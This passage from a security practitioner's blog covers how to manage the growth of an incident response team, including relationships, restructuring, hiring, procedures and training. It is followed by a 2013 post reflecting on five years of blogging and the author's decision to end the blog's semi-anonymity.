I honestly could go on and on about dealing with the growth of an IR team. There are so many things to consider that it is daunting to plan for growth ahead of time instead of just dealing with the hurdles as they come. However, if you have a team that is growing it really helps to take a step back and plan for both immediate and long-term growth. It is so important that a fair amount of this post will reiterate what I have explicitly or implicitly said in some of my previous "Building an IR Team" posts.

There are a number of questions to keep in mind when an IR team grows. What are the additional duties causing the addition of positions? Are the additional positions adequate to cover the additional duties and responsibilities? If not, how can expectations be managed so superiors understand what is actually feasible? Are the duties just a higher volume of what the team already is responsible for, or are there new areas that will require different types of team members and different types of training? What works well now but may be problematic with a larger team? Do we need to restructure? How do we maintain the success that led to the IR team growth? The last question is one of the most fundamental.

Relationships


At one point I worked on a team that, over the course of a few years, increased the number of personnel fourfold. This completely changed the dynamics of the team, from the lead all the way down to the most junior analyst. The more people you add, the more complex the relationships become. This applies not only to relationships within the team, but also relationships with other parts of your organization and management.

With such growth, it became a lot more important to clearly define roles and responsibilities, the command structure, and get management support of decisions.
  • Command structure: As the team grows, other groups in the company are less likely to know each person on the team. This means in a lot of cases it is helpful to have a few key people known to those other groups. These key people don't have to always be the ones to communicate with a specific group, but can be used as a fallback if the other group's first instinct is to be more adversarial with those people they don't know.
  • Intra-team relationships: The more people you have, the more you have to keep an eye on the working relationship between members. When you have a team that numbers single digits, it is almost natural to know all the ins and outs of the working relationships, for example who complements each other and who can be a good mentor to more junior analysts. It takes more conscious effort to track as you increase the number of people. Not only that, it requires more actively setting expectations about what you expect of them.
  • Management support and inter-team relationships: As a team gets bigger, its profile is raised throughout the company. This can make dealing with other groups easier, more difficult, or most likely a little bit of both. As we all know, IR teams sometimes need to make decisions or do things that are not popular and people outside the team view as irritating to say the least. It is very important to have management support when you invariably have conflicts with those outside the IR team. It's also important to have a manager that knows when to tell you that you're being unreasonable and the outside groups have a reasonable concern or complaint.
This is by no means a complete list of things to consider. The bottom line is that a larger team makes both intra- and inter-team relationships more complex.

Other Growing Pains


The simplest example I have from the past regarding growing pains was when I was on a team that was not gaining new areas of responsibility but was switching to coverage 24 hours a day seven days a week. As I covered in another blog post, it is important come up with the proper organization and make sure every shift was productive. Increasing the number of hours of coverage also obviously means hiring new analysts, plus the possibility of shifting current analysts to drastically different schedules.

Restructuring can often cause conflicts beyond those involving work schedules. On a small team, most people gravitate to a niche and can often be allowed to work in it as long as they also can handle the more generalized response duties. In a larger team, it's much harder to let members naturally gravitate towards certain areas while maintaining the ability to get all the work done. It certainly is nice to keep everyone happy and specializing in the areas they are most interested in, but it's not always realistic. One way to help with this is to make sure you follow the advice for redundancy in the "Organization" post, plus allow members to rotate through different areas of specialty. This means they won't be stuck in one particularly area in addition to providing redundancy of skills.

Another issue is making sure you formalize reporting to some degree. In a team of a few people, it's readily apparent what each person is doing. When you have a score of people, you need to get both formal and informal reporting from shift leads, team leads, mentors, and even individual analysts to properly understand who is doing what, workloads, what is working well, and what is not working. Regardless, the structure of a larger IR team probably needs to be more formal when it is larger. Notice the "probably." I think it is safe to say there may be exceptions to all these points! The key is to find the proper balance that enables useful reporting while avoiding unneeded bureaucracy.

Hiring can also create growing pains. I must stress that you should do everything possible to maintain standards when hiring. That said, a bigger team can mean more room and opportunity for less experienced analysts. One weak link among five people is a much bigger deal than one weak link among 30, so a larger team can allow you to take a chance or two when hiring. I've always been an advocate of getting smart people that can learn and are legitimately interested in the field over those who have experience but less potential for growth, and a larger team can sometimes make this easier to justify.

Evaluation of Procedures and Operations


This advice really applies to all IR teams, but becomes more important with growth. Incident response procedures that work well in a small team may not work as well with a larger group. Even if your team has not grown, you may want to regularly reevaluate IR workflow, reporting, or just about any existing procedures and standards of operations. Sometimes it may mean more clearly codifying what were once informal standards, while other times it may mean completely rethinking how you operate because you have several tiers of analysts. Having good metrics so you can try to make reevaluation more objective and less subjective also helps. Unfortunately, metrics is a huge topic that I can't address in this post, but there are many sites, papers, books, and more to help anyone interested in the topic.

Standards for working with the field may also need to change. If you are in an enterprise where the IR team often is reaching out to "boots on the ground" like local system administrators or IT staff, there may need to be changes in areas of responsibility when the IR team is larger. I partially covered this when mentioning inter-team relationships. Even if your IR team is comfortable contacting those in the field directly, those managing the people in the field may want a more formal command structure so they can track requests and other communications from the IR team. Contacts in the field may also want their roles and responsibilities more formally or clearly defined. This is easier to work through when the IR team only has a few people, but once there are dozens it can cause problems if those in the field don't know upfront what the IR team expects and what qualifies as an unusual request from the IR team.

Training


A larger IR team means the company is spending a lot more money on the team and security in general. It also means you may have enough team members to form a class-sized group. Whether you use in-house training, outsource, or a combination, a larger team means you will need to think about more formal training where a large group is in a classroom environment. This doesn't mean one-on-one or one-on-few mentoring and training should go away, but you will need to adapt to training larger groups. You also should consider setting aside money specifically for training if that was not done previously.

Be Flexible


Note that this is all based on my experiences in the past 10 or more years, but it is just the tip of the iceberg. Different teams may have different issues to consider when growing. Depending on the specific IR team, none of what I wrote may apply directly. I think there are two overriding concerns when an IR team grows. One is to be flexible as the team grows so your organization can really see what works and what does not. Two is to plan for the growth instead of just letting it happen haphazardly. Some teams do quite well with very little change after they've grown, while some may need drastic changes just because of adding a few people or analyst turnover.

Other Resources


There are some resources available to help deal with creating IR teams, and much of what applies at creation of a team can apply to the growth of a team. When a team goes from a few people to 20-30 people, you essentially are destroying the old team and creating a new one. Most of the questions considered when creating an IR team can be asked once again and reevaluated as the team grows.
Richard Bejtlich has posted on his blog about many aspects of building and maintaining SOCs, and also mentioned that he will have a chapter in his new book titled "Network Security Monitoring Operations," focused on sharing "the author’s experience building and leading a global Computer Incident Response Team (CIRT), such that readers can apply those lessons to their own operations." I presume anyone regularly reading my blog is already reading Taosecurity, and also anticipate that his new book will be quite useful.

I hope to have at least one more post in my "Building an IR Team" series. I may also have additional material, or collate and improve all my existing posts if I feel it is worthwhile.

01 March, 2013

Reflections on Over Five Years of Blogging

My first post to this blog was in September, 2007. Professionally speaking, I have gone through major changes since then. I've changed employer, though amazingly enough in this line of work that happened only once during that time. I have also learned a lot and my duties have changed quite a bit.

Though I try to stay plugged in to incident response, NSM, and all those other operational bits I love, I am definitely a step back from directly responding to incidents compared to a lot of my previous experience. Another big change for me is that I no longer run a bunch of NSM sensors though I still do that type of administration on my home network. On the other hand, one of the wonderful things about my current employer is that they allow us a lot of freedom to identify problems or challenges then take them on without trying to pigeonhole us. I look forward to 2013 as a year in which I will continue being challenged by taking on some new projects of interest to me.

I've gotten a number of links and traffic bursts on some of my past blog posts, which is flattering. I don't particularly feel like a unique snowflake that should get a ton of web traffic and don't usually get a ton of traffic, but occasionally I will really hit the nail on the head with a technical post and get a lot of traffic and links from other bloggers. Unsurprisingly, many of my top posts are in the system administration category since the more security-focused posts probably have a narrower target audience.

I attended FloCon 2013 in January, which made me reflect on a couple things. First, I am going to try and blog a little more often this year. It was very flattering to talk to people at the conference and have them say they have read my blog or to find they were using content I had contributed to NSMWiki. When I started this blog, my two main goals were to provide references for myself and to make those references available to others in case they also found them useful. It is good to know that my blog and other public contributions have been useful to others. I would not be where I am without similar help from others and I think that sharing of information, advice, experience, and debate is a great thing about much of the security community.

The second thing it drove home is that I need to end the semi-anonymous nature of this blog. At FloCon I found that I had coworkers following me on Twitter without even realizing it was me that they were following!

My previous employer knew about my blog and did not give me any grief whatsoever, but at the same time they were somewhat nervous about it. My current employer embraces public engagement to a much larger degree. Plenty of people already knew my name prior to this and Richard Bejtlich even linked to my blog using my name at least once, but generally I did not promote myself as the author. It is time to change that.